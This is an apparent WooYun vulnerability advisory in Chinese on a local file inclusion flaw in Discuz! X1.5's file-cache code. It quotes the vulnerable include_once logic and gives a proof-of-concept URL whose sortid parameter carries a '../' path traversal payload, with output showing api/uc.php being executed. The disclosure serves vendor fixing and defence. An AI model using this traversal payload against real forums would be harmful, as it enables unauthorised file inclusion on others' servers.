漏洞概要
缺陷编号: WooYun-2011-01195
漏洞标题: DISCUZX1.5 本地文件包含漏洞
相关厂商: Discuz!
漏洞作者: Jannock
提交时间: 2011-01-20
公开时间: 2011-02-19
漏洞类型: 本地文件包括
危害等级: 低
漏洞状态: 厂商已经确认
漏洞来源: http://www.wooyun.org
漏洞详情
简要描述:
DISCUZX1.5 本地文件包含
详细说明:
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
config_global.php
$_config[‘cache’][‘type’] = ‘file’;
function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}
……
}
地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
漏洞证明:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Authracation has expiried
执行了 api/uc.php 页面代码了。
0 条评论。